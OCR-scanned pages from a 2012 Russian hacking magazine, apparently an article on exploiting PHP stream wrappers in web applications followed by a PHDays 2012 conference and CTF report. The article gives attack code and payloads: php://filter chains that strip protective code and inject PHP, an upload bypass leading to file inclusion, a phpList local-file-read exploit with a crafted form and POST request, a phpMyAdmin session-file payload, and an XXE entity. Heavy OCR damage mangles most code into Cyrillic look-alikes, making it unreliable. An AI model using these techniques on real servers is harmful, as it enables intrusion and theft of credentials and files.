запомнить, сколько добавляли символов после каждого применения 
Ьазе64_сІесосІе. Эти значения удобней всего хранить в массиве, в на- 
шем случае это будеттакой массив: $а[0]=1 $а[1]=0 $а[2]=1 $а[3]=3. 
При взгляде на него становится ясно, что заглушка будет иметь 
вид Ѵ'.$52.$53, где строки $з2 и $зЗ состоят из символов алфавита 
и их длины кратны четырем, двойное применение Ьазе64_сІесосіе 
к $з2 даст/ и тройное применение Ьазе64_сІесосІе к $зЗ дает///. 
Условие «состоят из символов алфавита, и длины кратны четырем» 
необходимо для того, чтобы данные, находящиеся за заглушкой, 
декодировались без изменений (уже говорилось, что при Вазе64- 
декодировании строка разбивается на части по четыре символа). 
Строку $з2 можно построить так: применяем Ьазе64_епсосІе к об- 
ратному слешу, получаем строку І_ѵѵ==, которая содержит только два 
символа алфавита, поэтому двойное равенство в конце (==) заменим 
на д/. Конечно, это не единственная замена, которая нам подхо- 
дит, главное, чтобы после применения Ьазе64_сІесосІе получалась 
строка, отличающаяся от обратного слеша (первоначальной строки) 
только спецсимволами, которые пропадут при следующем декоди- 
ровании. Далее снова энкодим и снова меняем двойное равенство 
на д/, в итоге получаем ТНсІпІ_ѵѵд/. Аналогично строится строка $зЗ, 
в нашем случае она будеттакой: ѴЕЬгІ\І(ЗРп2у8/. Следующий скрипт 
демонстрирует, как «выдавливается» стоппер: 

$сопб?Рі1е = < ?рИр ехіі:; ?> 00 N01 КЕМОѴЕ ТНІ5 

І.ІНЕ\п"; 

$сопб?Рі!е .= біе аиііотаііісаііу ?епегаіесІ ог тосШіесІ 
Ьу Рімік; уои сап тапиаііу оѵеггісіе ІіИе сІе-РаиІІ: 
ѵаіиез іп ?1оЬа1.іпі.рбр Ьу гесіебпіп? іЬет іп ібіз 
бІе.Хп" ; 



$5=$сопб?Рі1е. "/ТНЬпил/§/УЕЬгМеКп 2 у 8 /" . Ьазе64_ 
епсос!е(Ьа5еб4 епсосіеб 

Ьазе64 епсос!е( , Ьа5еб4 епсос!е(Ьа5е64 епсосІеС ’Уез ! II: 
Ыогкз !'))))); 



■Рог (Іі = 1 ; $ і < = 5 ; $і++) { 

ргіпі $і . " \п" ; 

$5=Ьазе64_сІесосІе($5); 
ргіпі $5."\п"; 

} 

При всех выгодах данный метод уничтожения стопперов не 
может быть универсальным. В 2009 году было замечено, что функция 
Ьазе64_сІесосІе некорректно обрабатывает строки, содержащие в 
середине знаки равенства [#47174] ( Ы1.1у/Ыу6ВхХ ). Этот баг был до- 
вольно оперативно исправлен для функции Ьазе64_сІесосІе, но для 
фильтра сопѵег1.Ьазе64-сІесосІе никаких исправлений сделано не 
было. Поэтому, если при «выдавливании» на каком-то шаге получа- 
ются данные, содержащие знак равенства, дальнейшее применение 
фильтра сопѵег1.Ьазе64-сІесосІе уничтожит преобразуемую строку. 

$з ^ м рІір://б11:ег/геасІ=сопѵег1: . Ьазе64-сІесосІе/ 
гезоигсе=сІа1:а : „ сКБѴгсІА==СРАР " ; 
ѵаг сіитр/біе ?еі сопіепіз/Зз’И ; // ргіпі: зігіп^Ѳ) "" 

Но не только фильтр сопѵег1.Ьазе64-сІесосІе может удалять 
данные из потока, более эффективен в этом плане фильтр зігіпд. 
з1гір_1адз. 

ОСОБЕННОСТИ ФИЛЬТРА 5ТКШ0.5ТКІР_ТА65 

Фильтр зігіпд. з1гір_1адз появился в РНР в версии 5.0.0, использо- 
вание этого фильтра эквивалентно обработке всех данных потока 
функцией з1гір_1адз(). Фильтр может принимать аргументы в одной 
из двух форм: либо в виде строки со списком тегов, как и второй 
аргумент функции з1гір_1адз(), либо массив названий тегов. На- 
пример, чтобы удалить из строки все теги, кроме <Ь><і><и>, можно 
использовать фильтр зігіпд. з1гір_1адз таким образом: 

$бр = -Рореп/ ' рЬр: //оиіриі 1 . 1 ѵѵ 1 ) : 

5І:пеат_б11:ег_аррепсІ($-рр л ' зігіп?. зі:гір_і:а§5 ' х \ 
5ТКЕАМ_РІІ_ТЕК_1лІКІТЕ, аггаѵГ Ь ' . ' і ' . 'и')Ѵ. 

-Рыгі1:е($-Рр л "<Ь>Ьо1сІесІ Іехі</Ь> еп1аг?есІ іо \ 
а <Ь1>1еѵе1 1 ЬеасИ.п§</Ы>\п" ); 

-Рс1озе($-Рр); 

Применение фильтра зігіпд. зігір іадз удаляет не только НТМІ_- 
теги, также будут удалены РНР-теги и НТМЬ-комментарии. 

НТМІ_ Та?: <аЬс> 

РНР Та?:<? ?> 

НТМЬ С оттепіз : < ! -- --> 



Поэтому, если необходимо избавиться от стоппера, нужно 
каким-то образом не дать фильтру зігіпд. з1гір_1адз удалить внедря- 
емый РНР-код. Самый простой способ — это преобразовать нужные 
символы в диоІесІ-ргіпІаЫе формат (РРС2045, раздел 6.7), а потом 
применить фильтр сопѵегІщиоІесІ-рппІаЫе-сІесосІе. Использование 
фильтра сопѵегІ.диоІесІ-ргіпІаЫе-сІесосІе эквивалентно обработке 
всех данных потока функцией дио1есІ_ргіп1аЫе_сІесосІе(). Эта функ- 
ция обрабатывает строку посимвольно, если встречает символы в 
кодировке диоІесІ-ргіпІаЫе, то преобразует их в символы вось- 
мибитной кодовой таблицы. Например, если необходимо удалить 
вот такой простой стоппер: <? сііе; ?>\п", то с помощью фильтра 
сопѵег1.Ьазе64-с!есосІе это можно сделать следующим образом: 
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$сопіепі: = <? сііе; ?>\п"; 

$соп1:еп1= .= "[/Іѵ8ѵѴТР001КХ5ХрХЬХІіКит^К$12ѴКТ10иТѲ9]\п"; 
$Рі1е = 'р!ір://1і11:ег/ыгі1:е=сопѵег1:.Ьа5е64-сІесосІе|сопѵег1:. 

Ьа5е64-сІесосІе | сопѵегі: . Ьа5е64-сІесосІе/ге5оигсе= . /РоС ' ; 
б1е_ри1:_соп1:еп1:5($б1е л $сопіеп1:) ; 

При этом потребуется еще найти строку, выполняющую роль 
заглушки, в данном случае это будет/І_у8ѵ. Удалить этот же стоппер 
с помощью фильтра 5Ігіпд.5Ігір_1ад5 можно намного проще. 

$сопіеп1: = " ; <? сііе; ?>\п"^ 

$сопіеп1: .= " =ЗС=ЗГргіп1:( ' РНР ' ) ; \п"; 

$б1е = 'рІір://б11:ег/ыпі1:е=5І:гіп§.5І:гір_1:а§5|\ 

сопѵегі:. дио1:есІ-ргіп1:аЫе-сІесосІе/ге5оигсе=. /РоС ; 
біе риі: сопІіепІіБ^ІіІе. $соп1:еп1:) ; 

Здесь =ЗС, =ЗР — это символы <, ? в диоІесІ-ргіпІаЫе формате. 
Важно отметить, что фильтр сопѵегі. диоІесІ-ргіпІаЫе-сІесосІе не 
даст ожидаемого результата, если в строке содержится знак ра- 
венства, после которого нет шестнадцатеричного кода символа. 

$5= ' рбр : //Рі11:ег/геасІ=сопѵег1: . \ 

дио1:есІ-ргіп1:аЫе-сІесосІе/ге5оигсе=сІа1:а: .сI6V2=ВА^ , : 
ѵаг_сІитр(б1е_§е1:_соп1:еп1:5 ($5 ) ) ; // рпіпі: : біігіп^СѲ’) "" 

Поэтому стоит рассмотреть подробней и другие комбинации 
фильтров. 

5ТКШ0.5ТШР_ТА05 + С0ЫѴЕРТ.ВА5Е64-0ЕС00Е = РКОРІТ 

Для более эффективного использования фильтра 5Ігіпд.з1гір_ 
Іадз необходимо изучить некоторые его особенности. В офи- 
циальной документации можно найти упоминание следующего 
факта: если после символа < идет пробел, то символ < не воспри- 
нимается как начало тега и удаляться не будет. Это очень важный 
момент, так как при «выдавливании» в преобразуемых данных 
могут появиться символы <, поэтому, применяя к таким данным 
фильтр 5Ігіпд.з1гір_1ад5, возможно удалить сразу довольно боль- 
шую часть данных. Но важно знать, что будет интерпретировать- 
ся как НТМЬтег. Это легко определить с помощью фаззинга. 

($і=0; $і<256 ; $і++) { 

$5='Не11о < ' . сііг($і) . 'Ыогісі > АВС; 
есбо $і. ' -- ' . сИ г ( $і ) . ' -- 1 .5І:гір_ 

іа§5($5) . "\п'^ 

ь_ 

После запуска этого скрипта становится ясно, что если после 
символа < идут символы с АЗСІІ-кодами {9,10,11,12,13,32}, то знак < 
не воспринимается как начало тега. Еще один важный 
момент — наличие кавычек внутри тегов. Если тег содержит 
лишнюю (незакрытую) кавычку (' или "), то обрезается все после 
нее. Строка между кавычками воспринимается как атрибут тега и 
поэтому игнорируется полностью. 

есЬо Бігіріа^Б ( 1 Не Но <<Ыог"1сІ>Ц=Ь >> АВС У. 

# ргіпі: Неііо 

есбо 5ігір_1:а%5( 1 Неііо <<1лІоп"1сІ>и=Ь >"> АВСѴ. 

# ргіпі:: Неііо АВС 

есИо Бігіріа^Б ( 1 Неііо <<Ыог"1сІ>Ц=Ь ><"> АВСѴ. 

# ргіпі:: Неііо АВС 

При этом 5Ігір_1адз игнорирует экранирование кавычек 
[#45599] ( ЬіІ.Іѵ/МРдсУХ ). 

ОБХОД ПРОВЕРКИ НА ОСНОВЕ 0ЕТІМА0Е5І2Е 

С помощью фильтров можно удалять не только стопперы. Можно, 
например, модифицировать содержимое изображения, после того 



ПРОДОЛЖАЕМ ТЕМУ ИССЛЕ- 
ДОВАНИЯ ВРАППЕРОВ ЯЗЫКА 
РНР С ТОЧКИ ЗРЕНИЯ АТАКИ 
НА ВЕБ-ПРИЛОЖЕНИЯ 

как оно прошло проверку на основе функции деіітадезіге. В каче- 
стве примера рассмотрим скрипт, в котором присутствуют такие 
участки кода: 

ехігас1:($_КЕОЦЕ5Т); 



іпсіисіе $іетр1а1:есІіг./УІіеасІег. біті 1 ; 



і±іи_ещІу:($_РІІ_Е5) ) { 

$б!е_іп-Ро = ^еііта^е5І2е($ РІІ_Е5[ 1 іта^е 1 ] [ Чтрпате' ]) ; 
іі($б1е_іп-Ро[ 'тіте 1 ] == 1 іта§е/дре§' 
іі(тоѵе_ир1оасІесНі1е($_РІІ-Е5[ ' іта§е' ]\ 

[ ' ітр-Пате' ] л $-Ро1сІег. '/аѵаіаг. 

ІР&'ЛІ 



При отсутствии І\ІІИ_І_-байта может показаться, что нет воз- 
можности ни проэксплуатировать РРІ, ни загрузить что-то, кроме 
файла аѵаіагдрд. Но врапперы предоставляют нам новые способы 
эксплуатации подобного рода уязвимостей. 

1. В ЕХІР-изображение внедряем данные в необходимом формате 

и загружаем это изображение, определив переменную $1оИег 
таким образом: 

-Ро1сІег=рІір: //б1і:ег/ыгі1:е=5І:гіп^. Бігір іа^Б | сопѵегі:. 
Ьазе64-сІесосІе/ге5оигсе=/1:тр/ 

После прохождения проверки деіітадезіге, но перед сохра- 
нением на диск изображение будет обработано фильтрами и 
превратится в 2 Ір-архив. 

2. Инклюдим файл внутри этого 2 Ір-архива. Для этого использу- 
ем в рап пер 2 Ір. Более подробно об его использовании я расска- 
зал в предыдущей статье (статья «Ядовитая обертка», август 
2012 года). 

Іетр 1 а 1 :ес 1 іг= 2 ір: ///ітр/аѵаіаг. ір^#/тѵ 

С помощью фильтров можно не только «выдавливать» данные, 
но и просто удалять часть файла, если есть такая необходимость. 

ЧАСТИЧНОЕ ЧТЕНИЕ ФАЙЛОВ 
В РНРЫ5Т <= 2.10.13 

Рассмотрим довольно интересную уязвимость в скрипте рЬрІ_І5І 
2.10.13. Причиной данной уязвимости является возможность из- 
менять структуру в массиве $_РІІ_Е5. Первое упоминание об этой 
особенности массива $_РІІ_Е5 появилось еще в 2004 году ( Ьіі.іѵ/ 
РЕ2І1І ). Но исправлено это было только в 2012-м ( Ьі1.1ѵ/М0І7х1 ). 
Итак, в рРірІ_І5І 2.10.13, в файле ./абтіп/соттопІіЬ/радез/иБег.рЬр 
можно найти следующий код: 

і-р ( ізаггау ( $>_ГІ І_Е5 } } I ## опіу аѵаіагз аге Рііез 
-Рогеасб ($_ГІІ.Е5[ ' аіігіЬиіе ' ] [ ' пате ' ] аз $кеѵ 
$ѵа1) Л 

і-р (!етріѵ($_РІІ.Е5[ , аіігіЬиіе , ][ , пате , ][$кеу])) { 
$ітрпат = $_РИЕ5[ 'аіігіЬиіе' ] [ Чтр пате' ] [$кеѵ] ; 
$5Ііе = $_РІІ.Е5[ ' аіігіЬиіе ' ] [ ' зіге ' ] [$кеу] ; 



ХАКЕР 09/164/2012 



073 



взлом 



і-р ( $5І2е < МАХ АѴАТАК БІ1Е) { 

$аѵа1:аг = біе ^еі: _согѵЬеітЬ5($1:трпат) ; 
$д1_0иегѵ(5ргіп1:-Р( ( гер!асе іпііо %б 
( иБегісІ . аНгіЬи'ЬеісІ . ѵаіие) 

ѵа1ие5(%сІД <\ 3 "%ъ")1_, 

$1:аЫе5["и5ег_а1:1:гіЬи1=е" ] ^ 

$ісІ „ $кеу „ Ьа5е64_епсосІе($аѵа1:аг) ) ) ; 

Несложно понять, что для того, чтобы использовать этот код 
для загрузки произвольных локальных файлов в базу данных, до- 
статочно создать такую НТМЬформу: 

<-Ропт асЕіоп="ІгЕ'Ер: //ІосаІЬоБІі/ІІБІіБ/ 
асІтіп/?ра^е=и5еп&ісІ=1" те1:ЬосІ="Р05Т" 
епс1:ѵре=" т и11=іраг1=/-Рогт-сІа1:а" > 

<іпри1: 1іуре="б1е" пате="а1:1:гіЬи1:е[1:тр_пате] ["> 

<іпри1: 1:уре="б1е" пате="а1:1:гіЬи1:е[5І2е] ["> 

<іпри1: 1:уре="б1е" пате="а1:1:гіЬи1:е[ [Ттр_пате] "> 

<іпри1: 1:уре="б1е" пате="а1:1:гіЬи1:е[пате] ["> 

<іпри1: пате="сЬап§е" ѵа1ие="5аѵе СЬап§е5" Туре= ,, 5иЬті1: ,, > 
</Тогт> 

Открыв эту НТМЬформу в браузере и выбрав необходимые фай- 
лы, на удаленный сервер можно отослать следующий Р05Т-запрос 
(в поле Сопіепі-Туре указываем путь до локального файла): 

Р05ЮАТА = 277443277232757 

Соп1:еп1:-РІ5ро5І1:іоп: -Рогт-сіаііа ; пате="а1:1:гіЬи1:е[1:тр_пате] 

[ " ; б1епат е=" іта§ ео'р§" 

Соп1:еп1:-Туре ^/раТЬ/То/ІосаІ/бІе. рЬр 



277443277232757 

Соп1=еп1=-РІ5ро5І1=іоп: •Рогш-сіаііа ; паше="а1=1=гіЬи1=е[5І2е] [" ; 
б1епате="1" 

СопѣеггР-Туре: арр1іса1:іоп/ос1:е1:-5І:геат 



277443277232757 

СопІіепІі-РІБроБІІііоп : -Рогт-сіаііа ; пате="а - Е'ЕгіЬігЕе[ [1:тр 
пате]"; б1епате=" 1" 

Сопііепіі-Туре: арр1іса1:іоп/ос1:е1:-5І:пеат 



277443277232757 

Соп1:еп1:-РІБро5гбіоп : Тогт-сІа1:а; пате="а1:1:гіЬи1:е[пате] [ " ; 
б1епате="1" 

Соп1=еп1:-Туре: арр1іса1:іоп/ос1:е1=-5І=пеат 



277443277232757 

СоігЕеігЕ-РІБроБгЕіоп : Тогт-баТа; пате="сЬап§е" 



5аѵе СЬап§е5 

277443277232757- - 



В результате в массиве $_РІІ_Е5 появится элемент 

$_Р ИЕ5[а1=1=піЬи1=е] [1:тр_пате] [ [Туре] = 

/раТЬ/То/ІосаІ/бІе . рМр 

Это, в свою очередь, приведет к тому, что в базу данных будет 
загружено содержимое файла /раіЬЛо/ІосаіЛіІе.рЬр. После всех 
этих манипуляций останется только получить данные из соот- 
ветствующей ячейки с помощью 5СП_-инъекции. При этом файлы 
будут загружаться в таблицу рЬрІІ5І_и5ег_и5ег_аигіЬііІе, в поле 
ѵаіие, которое имеет тип ѵагсЬаг(255). К тому же перед загрузкой 
содержимое файла обрабатывается функцией Ьазе64_епсобе, 



что, по сути, дает возможность сохранить в базу только 192 
символа, но это ограничение можно обойти с помощью враппера 
рЬр:/ЛіІ{ег. Например, если необходимо узнать пароль от базы 
данных из такого файла (важно, что в этом файле нет знаков 
равенства): 

* ТЬе баТаЬазе сопб§игаТіоп5 . 

* 

* МѵБОІ- БеЦігщБ - Уои сап §еТ ТЬіб іітРо Тгот уоиг меЬ 

* Ьобі: 

/** ТЬе пате оТ ТЬе баТаЬазе */ 
сІебпе( 'РВ_МАМЕ' , 'сгпб'); 



/** МѵБОІ- СІаІіаЬаБе иБегпате */ 
бебпе( ' ОВ_115ЕК'^_ ' бЬизег'Х; 



/** Му5(2І_ СІаІіаЬаБе разБмогб */ 
бебпе( ' ВВ_РА55ІлЮКР ' ' 53сгеТр455 ' ) ; 



/** Му5(2І_ ЬоБТпате */ 

бебпе ( 1 РВ Н05Т 1 . ' іосэіЬобТ ' ) ; 

Можно обработать содержимое файла фильтром сопѵегТЬазе64- 
бесобе. 

рЬр: //б1Тег/геаб=сопѵегТ . Ьа5е64-бесобе/ге5оигсе=/ 
раТЬ/То/ІосаІ/бЬ.рЬр 

Таким образом в базу данных попадут уже 255 символов из не- 
обходимого нам файла, при этом символы не из алфавита Вазе64 
будут проигнорированы. Если пароль от базы данных не будет 
содержать специальных символов, мы его узнаем полностью. Если 
использовать фильтр 5Іппд.5Ігір_Іад5, можно попытаться вырезать 
часть файла, и тем самым в базу данных уже загрузятся не первые 
192 символа, а, возможно, какая-то другая часть файла. Например, 
можно узнать логин и пароль от базы данных из конфигурационно- 
го файла ВВРгезз'а таким образом: 

рЬр: //бІТег/сопѵегТ. Ьа5е64-епсобе ) бТгіп§. гоіііЗ | сопѵегіі. 
Ьа5е64-сІесосІе | бТгіп§. 5Тгір_Та§5 1 

сопѵегТ. ЬазебД-епсобе | бТгіп§. гоТІЗ | сопѵегТ . Ьа5е64-бесобе/ 
ге5оигсе=/ЬЬрпе55/ЬЬ-сопб§. рЬр 

ВЕКТОРЫ АТАК 

Итак, что же дает нам применение фильтров при уязвимостях 
типа Рііе Мапіриіабоп? В первую очередь появляется возможность 
трансформировать данные. Например, если удалось внедрить 
данные в какой-либо файл, на атакуемом сервере мы можем с по- 
мощью рЬр://ЬЬег/ его трансформировать и в результате получить 
уже файл с произвольным содержимым. Чем могут быть полезны 
такого рода файлы? Если нет возможности создавать файл в веб- 
руте, можно попробовать: 

1. Создать файл сессии. 

Создание сессии дает возможность произвести различ- 
ные виды атак. Например, можно обойти авторизацию, 
если веб-приложение использует сессии для авторизации 
пользователей. Также можно реализовать ипзегіаііге Ьид 
через 5е55Іоп_5Іагі(), если приложение содержит уязвимые 
магические методы. Тутуместно вспомнить про ипзегіаііге Ьид, 
в скрипте БсгірІз/зеІир.рЬр рЬрМуАбтіп. Эта уязвимость была 
исправлена в версии 2.11.10 тем, что из скрипта Бспріз/зеіир. 
рЬр был удален ипзегіаііге, принимающий данные от пользо- 
вателя, при этом уязвимый магический метод так и остался 
в коде рЬрМуАбтіп. Так как рЬрМуАбтіп использует сессии, 
осталась возможность проэксплуатировать уязвимость ме- 
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тода ѵѵакеир с помощью зе55Іоп_з1агі(). Например, если у 

пентестера есть доступ в рЬрМуАсІтіп с привилегией РНЕ, он 
может создать файл сессии (с помощью оператора 5ЕІ.ЕСТ ... 
ІЫТО ОІЛРПЕ): 

ххх | а : 1 : {і :0;0: 10: "РМА_Сопб§" : 1 : {5 : 6_^5оигсе" ; 5 : 63 : 
"-Р1:р://тупате:тура55(а)-Р1:р. пагосі . ги/ра'ЕІі'Ео/іпсІех.ЪсЕ" : }} 

После того как нужный файл сессии создан, остается только 
обратиться к Ьі1р://зі1е.сот/рЬртуасІтіп/ с соответствую- 
щим РНР5Е55Ю. Этот способ будет работать для всех версий 
рбрМуАсІтіп. 

2. Создать или перезаписать шаблоны. 

Если веб-приложение использует темплэты,то, перезаписывая 
или создавая новые темплэты, можно использовать уязвимости 
шаблонизаторов. 

3. Создать гір-архив и проэксплуатировать КРІ. 

4. Создать/перезаписать файлы Іііассевз/Іііраззѵѵсі. 

Иногда бывает, что нельзя создавать файлы в веб-руте 
средствами РНР, но можно перезаписывать файлы Ыассезз/ 
ЫраззѵѵсІ. Перезапись этих файлов позволяет: обходить авто- 
ризацию, выполнять команды и даже получать информацию 
о конфигурации сервера АрасЬе [ Ы1.1у/1и9СиР. Ы1.1у/С1т2а5х ). 
Кроме трансформации файлов, враппер рбр://1іІ1ег дает воз- 
можность манипулировать функциями, которые обрабатывают 
файлы только определенного типа. 

ФУНКЦИЯ РАР5Е_ІІ\ІІ_РІІ_Е 

Согласно официальной документации, функция раг5е_іпі_ГіІе име- 
ет следующий синтаксис: 

аггау раг5е_іпі_61е ( б1:гіп§ $61епате [ л Ьооі $ргосез5_ 
зесСіопз = -Раізе 

[Лп1= $зсаппег тосіе = ІЫІ БСАШЕК МКМАІ. ]] ) 

Эта функция загружает іпі-файл, указанный в аргументе 
Іііепате, и возвращает настройки из іпі-файла в виде ассоциа- 
тивного массива. Так как в іпі-файлах обычно находятся важные 
для работы веб-приложения данные, функция раг5е_іпі_ТМе может 
работать только с локальными файлами, но при этом в качестве 
$1іІепате можно использовать врапперы. Предположим, что у нас 
есть возможность внедрить данные в файл сессии, например, в 
скрипте есть такой код: 

5е55Іоп_5І:аг1:( Хі 

$_5Е55ІОМ [ 1 асішіп 1 ] = $_Р05Т[ ' пате ' ] ; 



$ѵаг = раг5е_іпі_б1е($іпіб1е) ; 
гедиіге $ѵаг [ ' гедиіге 1 ] ; 

Тогда, создав файл сессии /ітр/зез5_сІ11сІ5СІ124д55СІд5СІ9СІ с 
таким содержимым: 

айпіп | 5 :68:”Іу8ѵѴпрОѴІлІРНТпШКХКдѴ12аМРрС2НІ\І1ѴпВѴТІІсІ5ТІІІ5ІлІ 
ХсіХіліСб ІУд 3 3 е1Кд(Зтр1Ѵ1лІ5 5" 



мы можем, используя фильтры, преобразовать этот файл в фор- 
мат, доступный функции рагзе_іпі_1іІе: 

рбр : 7/б11:ег/геасІ=сопѵег1: . Ьа5е64-с1есос1е [ сопѵегі: . Ьазе64- 
сіесосіе | сопѵегі: . Ьа5еб4-сІесосІе/пе5оигсе= /1:тр/5е55_ 
сі-РТсі б сІТ 24 § б б сі § б сі 9 0 

Что в данном случае приведет к уязвимости Ретоіе Рііе ІпсЫе. 

ХХЕ-АТАКИ 

ХМІ_ — широко распространенный текстовый формат, предна- 
значенный для хранения структурированных данных, которые 
используются при обмене информацией между программами. 
Хорошо известно, что в ХМЬдокумент можно добавлять содер- 
жимое внешних файлов с помощью внешних сущностей (ехіегпаі 
епііііез], но при этом итоговый документ должен быть ѵѵеІИогтесІ. 
В РНР обойти это ограничение можно с помощью фильтра сопѵегі. 
Ьазе64-епсосІе. 

ВураББ ме11--РоптесІ ХМІ_ оііѣри* сііеск 

<?хт1 ѵег5Іоп= ' 1.0' 5І:апсІа1опе= 'уеБ ' ?> 

< ! РОСТУРЕ Бсап 

<!ЕІ\ІТІТѴ ххе 5Ѵ5ТЕМ "рбр : //біііег/сопѵепі: . Ьа5еб4-епсосІе/ 
пе5оигсе=^УсІЬ.рІір ,, > 

]> 

<5сап>&ххе; </ бсэп> 

Но врапперы можно использовать не только внутри ХМІ_- 
документа, но и в функции зітрІехтІ_ІоасІ_1іІе и в методе 
00М0осштеп1::ІоасІ. Это дает возможность произвести ХХЕ-атаку 
при аІІо\л/_игІ_1ореп =011, если есть возможность манипулировать 
именем файла. 

ЗАКЛЮЧЕНИЕ 

На этой ноте я завершаю свое повествование об использовании 
врапперовдля построения продвинутых техник эксплуатации 
уязвимостей в веб-приложениях. 

Врапперы очень гибкая и функциональная штука, вполне 
возможно, что я еще вернусь к ним в будущих статьях. Напомню, 
что защититься от подобного рода атак достаточно просто: провер- 
ки на основе функций 1іІе_ехіз1з, із іііе, Іііезіге не дадут восполь- 
зоваться врапперами рбр://1іІ1ег, гір://, баіа://, сотргезз.гІіЬ://. 

При установленном патче ВиЬозіп по умолчанию невозможно 
использовать врапперы в инклюдах, даже если директива аІІоѵѵ_ 
игИпсЫе имеет значение Оп. Для использования врапперов 
в таком случае необходимо добавить их в вайт-лист, например 

Обертка РНР в вайт-листе ЗиМоБІп^а 

зиІіоБІп .ехесиѣог. іпсІисІе.ыІііІіеІІБІ: ^"рбр" 

Теперь ты знаешь, что такое врапперы и как их правильно 
использовать. Попробуй взглянуть на закрытые уязвимости по- 
новому, возможно, их и не закрыли... 51ау ѵѵгарресі! I С 



Данная статья основана 
на выступлении 
Алексея Москвина 
на международном 
форуме по практической 
безопасности 
Ро5І1іѵеНаскОауз2012. 
Презентация доклада 
доступна по этому адресу: 
БІісіезЬа.ге/МТКктІ . 



ЗАЩИТИТЬСЯ ОТ ТАКИХ АТАК ПРОСТО: ПРОВЕРКИ 
НА ОСНОВЕ ФУНКЦИЙ РІЬЕ_ЕХІ5Т5, 15_РІЬЕ, РІІ.Е5І2Е 
НЕ ДАДУТ ВОСПОЛЬЗОВАТЬСЯ ВРАППЕРАМИ РНР:// 
РІ1.ТЕК, 2ІР://, ВАТА://, С0МРКЕ55.2ЫВ:// 
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РНОауз II 

2012 : ^ 

КАК ЭТО БЫЛО? 

ОТЧЕТ О КОНФЕРЕНЦИИ 
ПО ПРАКТИЧЕСКОЙ 
БЕЗОПАСНОСТИ 
В КАРТИНКАХ 




Грандиозная затея собрать в одном месте «пид- 
жаки» и «футболки» удалась. В Москве прошла 
сумасшедшая (в самом хорошем смысле этого 
слова) конференция для людей, которые при- 
нимают решения о вопросах безопасности в 
больших компаниях, и для людей, которые не 
понаслышке знают, что такое взлом. Как это 
происходило, какие сюрпризы подготовили 
организаторы и какие доклады нам особенно 
запомнились, — в этом материале. 




ервое, что привлекало внимание каждого, кто появлялся на 
площадке РозШѵе Наск Бауз, — это огроменный аквариум, 
заваленный распечатками А4. «Что это?» — спрашиваю я 
у организаторов, компании РозШѵе ТесИпоІодіез. Это одно из заданий 
грандиозного СТР, в котором участникам нужно будет показать на- 
выки олдскульного способа добычи полезной информации, копаясь в 
буквальном смысле в мусоре. Уже с этого момента становится ясно, что 
конференция будет гораздо большим, чем сессии докладов, парал- 
лельно идущих в нескольких залах. Это ощущение укрепляется, когда 
обходишь немаленькую территорию конференции, — кстати, все про- 
исходило в центре Москвы на одной из самых продвинутых площадок 
с символическим названием Біді1;аІ СНоЬег. Огромное количество 
декораций, стендов, затравок для конкурсов, атмосферный бар с бес- 
платным алкоголем, но главное... невероятное количество знакомых 
людей. Кажется, что собрать еще больше спецов из области ИБ под 
одной крышей невозможно. Ну или по крайней мере очень сложно. 
Простой пример: мы познакомились сразу с несколькими авторами ] 

[, которых раньше знали только виртуально. В итоге всю конференцию 
мы были в состоянии выбора: то ли пообщаться с интересными людьми, 
то ли бежать на доклад. Но если доклад, то какой? Часто интересные 
выступления были параллельно. Впрочем, была доступна прямая 
видеотрансляция, что решало проблему. 

О ЧЕМ ГОВОРЯТ НА РН0АУ5? 

Вообще доклады были очень разнообразны (видео и слайды доступны 
здесь: ЬіБІѵ/ЭУОкбР І, особенно с учетом того, что организаторы при- 
гласили людей из самых разных сфер ИБ. Наш выбор — это, конечно, 
чисто технические исследования, которых было немало. Кратко коснусь 
наиболее запомнившихся. Тревис Гудспид рассказал, как можно исполь- 
зовать шумы и внедрять пакеты на первом уровне модели 051 (Раскеі- 
іп-Раске*). Любопытное исследование представили ребята из ЕІсотзоЛ: 
— Дмитрий Скляров и Андрей Беленко. Взяв популярные менеджеры 
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РЕЮауз 2012: как это было? 



КАК ПРОХОДИЛ СТР? 



рандиозный СТР, проведенный в рамках РРЮауз, 
заслуживает отдельного слова. Площадка, на 
которой разместились 12 именитых команд, 
занимала львиную часть большого Ргодгезз-Ваг'а, где на 
протяжении двух дней тусовалось огромное количество 
людей, связанных с информационной безопасностью. Как 
и в классическом СТР, основной задачей участников было 
выявить уязвимости в системах противников и получить 
доступ к секретным ключам, индивидуальным для каждой 
команды. Участники параллельно работали над поиском 
уязвимостей сразу в четырех сервисах, состояния которых, 
а следовательно, и их баги менялись каждые несколько 
часов. Основные очки участники получали за эксплуа- 
тацию найденных ими уязвимостей на серверах команд- 
соперников. Доказательством успешной эксплуатации 
являлся Мй5-хеш, после добавления которого в скоринг- 
систему команде начислялись баллы в зависимости от 
сложности задания, установленной организаторами. Если 
какой-либо из сервисов команд был недоступен более пяти 
минут, команде начислялись штрафные баллы. Все честно. 

Заветные баллы команды могли получить и за решение 
заданий из зоны хак-квеста — отдельной сети, в которой 
находились серверы с уязвимыми сервисами. Эти задания 
участники могли решать только методом черного ящика, то 
есть локального доступа к системам у них не было. Парал- 
лельно задания могли решать все желающие с любого конца 
света — для этого был построен ѴРІЧ-канал до этой сети. 

Чтобы участники не засиживались на месте, им предо- 
ставлялась возможность получить дополнительные баллы, 
занявшисьтак называемым сіитрз^ег сііѵіпд, — короче го- 
воря, поупражняться в добыче информации старым как мир 
путем. Для этого организаторы поставили по-настоящему 
огромный прозрачный бокс, заваленный распечатками на 
А4. Кроме листов с мусорной информацией, можно было 
найти и бумаги с теми самыми «флагами», за которые на- 
числялись очки. 

Забавным ответвлением основной легенды также было 
задание «Царь горы». Это максимально реалистичный 
конкурс для пентестеров: типовой периметр сети средне- 
статистической компании с уязвимыми веб-приложениями 
и различными сервисами, за всем этим скрывается МісгозоЙ 
Асііѵе йігесіюгу. Задача участников — обнаружить уязвимо- 
сти в системах, воспользоваться ими и максимально долго 





удерживать захваченные системы. Как? Дело в том, что 
после захвата системы одной из команд, цепочки уязви- 
мостей перегенерируются, и у команды был выбор: либо 
пытаться захватить смежные системы, либо продолжить 
поискуязвимостей в уже захваченной системе. К слову, 
время удержания Асбѵе йігес^огу было самым дорогим. Оно 
и понятно, ведь для того, чтобы провести атаку на службу 
каталогов, требовалось удерживать системы, расположен- 
ные на первом уровне (читай - периметре]. Все как в жизни... 

Вопреки ожиданиям организаторов, участники не ра- 
зошлись на ночь по своим отелям, а продолжали рубить- 
ся и решать задания, отлучаясь по своему собственному 
расписанию на короткий часовой сон. На второй день 
столы участников были буквально завалены энергети- 
ками (кажется, многие иностранные участники оценили 
наши российские напитки). Одной из команд удалось 
считерить и пробросить внешний туннель, подключив 
